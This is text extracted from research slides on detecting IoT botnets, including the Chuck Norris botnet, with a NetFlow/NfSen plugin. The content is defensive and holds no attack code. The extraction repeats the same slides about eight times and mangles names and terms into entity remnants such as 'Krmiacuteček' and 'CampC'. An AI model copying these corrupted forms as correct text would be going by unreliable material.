Project CYBERhttpwwwmuniczicscyber
Detecting Botnetswith NetFlow
This material is based upon work supported by theCzech Ministry of Defence under Contract No OVMASUN200801
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 28 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Botnet distribution sites detection
Botnet CampC centers detection
DNS spoofing attack detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Botnet distribution sites detection
Botnet CampC centers detection
DNS spoofing attack detection
ADSL string detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Web Interface ndash Infected Host Detected
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 24 28
Part V
Conclusion
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 25 28
Detection Plugin and Other Botnets
Botnet Lifecycle Similar for Majority of Botnets
scanning for possible botsinfection of a vulnerable devicesbot initializationupdatebotnet operation
Botnet Detection Plugin Customization
modular plugin engineeasy modification for detection of other botnetwe need to customize detection methodsplugin distributed under the BSD license
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 26 28
ConclusionNetwork Devices Are Not Protected
Routers access points printers cameras TVs No AV software missing patches and firmware updatesBut they should be protected
ExperienceNetFlow can monitor all such devices in networkDiscovery of new Chuck Norris botnet using NetFlowDeveloped a specialized NfSen plugin for Chuck Norrisbotnet detection
FutureChuck Norris is down but others are coming (eg Stuxnet)We are open to research collaborationDetection plugin is available at our project site
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 27 28
Thank You For Your Attention
Vojtěch KrmiacutečekTomaacuteš Plesniacutekvojtec|plesnikicsmunicz
Project CYBERhttpwwwmuniczicscyber
Detecting Botnetswith NetFlow
This material is based upon work supported by theCzech Ministry of Defence under Contract No OVMASUN200801
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 28 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Botnet distribution sites detection
Botnet CampC centers detection
DNS spoofing attack detection
ADSL string detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Web Interface ndash Infected Host Detected
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 24 28
Part V
Conclusion
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 25 28
Detection Plugin and Other Botnets
Botnet Lifecycle Similar for Majority of Botnets
scanning for possible botsinfection of a vulnerable devicesbot initializationupdatebotnet operation
Botnet Detection Plugin Customization
modular plugin engineeasy modification for detection of other botnetwe need to customize detection methodsplugin distributed under the BSD license
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 26 28
ConclusionNetwork Devices Are Not Protected
Routers access points printers cameras TVs No AV software missing patches and firmware updatesBut they should be protected
ExperienceNetFlow can monitor all such devices in networkDiscovery of new Chuck Norris botnet using NetFlowDeveloped a specialized NfSen plugin for Chuck Norrisbotnet detection
FutureChuck Norris is down but others are coming (eg Stuxnet)We are open to research collaborationDetection plugin is available at our project site
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 27 28
Thank You For Your Attention
Vojtěch KrmiacutečekTomaacuteš Plesniacutekvojtec|plesnikicsmunicz
Project CYBERhttpwwwmuniczicscyber
Detecting Botnetswith NetFlow
This material is based upon work supported by theCzech Ministry of Defence under Contract No OVMASUN200801
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 28 28
Web Interface ndash Infected Host Detected
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 24 28
Part V
Conclusion
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 25 28
Detection Plugin and Other Botnets
Botnet Lifecycle Similar for Majority of Botnets
scanning for possible botsinfection of a vulnerable devicesbot initializationupdatebotnet operation
Botnet Detection Plugin Customization
modular plugin engineeasy modification for detection of other botnetwe need to customize detection methodsplugin distributed under the BSD license
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 26 28
ConclusionNetwork Devices Are Not Protected
Routers access points printers cameras TVs No AV software missing patches and firmware updatesBut they should be protected
ExperienceNetFlow can monitor all such devices in networkDiscovery of new Chuck Norris botnet using NetFlowDeveloped a specialized NfSen plugin for Chuck Norrisbotnet detection
FutureChuck Norris is down but others are coming (eg Stuxnet)We are open to research collaborationDetection plugin is available at our project site
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 27 28
Thank You For Your Attention
Vojtěch KrmiacutečekTomaacuteš Plesniacutekvojtec|plesnikicsmunicz
Project CYBERhttpwwwmuniczicscyber
Detecting Botnetswith NetFlow
This material is based upon work supported by theCzech Ministry of Defence under Contract No OVMASUN200801
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 28 28
Part V
Conclusion
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 25 28
Detection Plugin and Other Botnets
Botnet Lifecycle Similar for Majority of Botnets
scanning for possible botsinfection of a vulnerable devicesbot initializationupdatebotnet operation
Botnet Detection Plugin Customization
modular plugin engineeasy modification for detection of other botnetwe need to customize detection methodsplugin distributed under the BSD license
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 26 28
ConclusionNetwork Devices Are Not Protected
Routers access points printers cameras TVs No AV software missing patches and firmware updatesBut they should be protected
ExperienceNetFlow can monitor all such devices in networkDiscovery of new Chuck Norris botnet using NetFlowDeveloped a specialized NfSen plugin for Chuck Norrisbotnet detection
FutureChuck Norris is down but others are coming (eg Stuxnet)We are open to research collaborationDetection plugin is available at our project site
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 27 28
Thank You For Your Attention
Vojtěch KrmiacutečekTomaacuteš Plesniacutekvojtec|plesnikicsmunicz
Project CYBERhttpwwwmuniczicscyber
Detecting Botnetswith NetFlow
This material is based upon work supported by theCzech Ministry of Defence under Contract No OVMASUN200801
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 28 28
Detection Plugin and Other Botnets
Botnet Lifecycle Similar for Majority of Botnets
scanning for possible botsinfection of a vulnerable devicesbot initializationupdatebotnet operation
Botnet Detection Plugin Customization
modular plugin engineeasy modification for detection of other botnetwe need to customize detection methodsplugin distributed under the BSD license
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 26 28
ConclusionNetwork Devices Are Not Protected
Routers access points printers cameras TVs No AV software missing patches and firmware updatesBut they should be protected
ExperienceNetFlow can monitor all such devices in networkDiscovery of new Chuck Norris botnet using NetFlowDeveloped a specialized NfSen plugin for Chuck Norrisbotnet detection
FutureChuck Norris is down but others are coming (eg Stuxnet)We are open to research collaborationDetection plugin is available at our project site
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 27 28
Thank You For Your Attention
Vojtěch KrmiacutečekTomaacuteš Plesniacutekvojtec|plesnikicsmunicz
Project CYBERhttpwwwmuniczicscyber
Detecting Botnetswith NetFlow
This material is based upon work supported by theCzech Ministry of Defence under Contract No OVMASUN200801
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 28 28
ConclusionNetwork Devices Are Not Protected
Routers access points printers cameras TVs No AV software missing patches and firmware updatesBut they should be protected
ExperienceNetFlow can monitor all such devices in networkDiscovery of new Chuck Norris botnet using NetFlowDeveloped a specialized NfSen plugin for Chuck Norrisbotnet detection
FutureChuck Norris is down but others are coming (eg Stuxnet)We are open to research collaborationDetection plugin is available at our project site
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 27 28
Thank You For Your Attention
Vojtěch KrmiacutečekTomaacuteš Plesniacutekvojtec|plesnikicsmunicz
Project CYBERhttpwwwmuniczicscyber
Detecting Botnetswith NetFlow
This material is based upon work supported by theCzech Ministry of Defence under Contract No OVMASUN200801
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 28 28
Thank You For Your Attention
Vojtěch KrmiacutečekTomaacuteš Plesniacutekvojtec|plesnikicsmunicz
Project CYBERhttpwwwmuniczicscyber
Detecting Botnetswith NetFlow
This material is based upon work supported by theCzech Ministry of Defence under Contract No OVMASUN200801
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 28 28
Recommended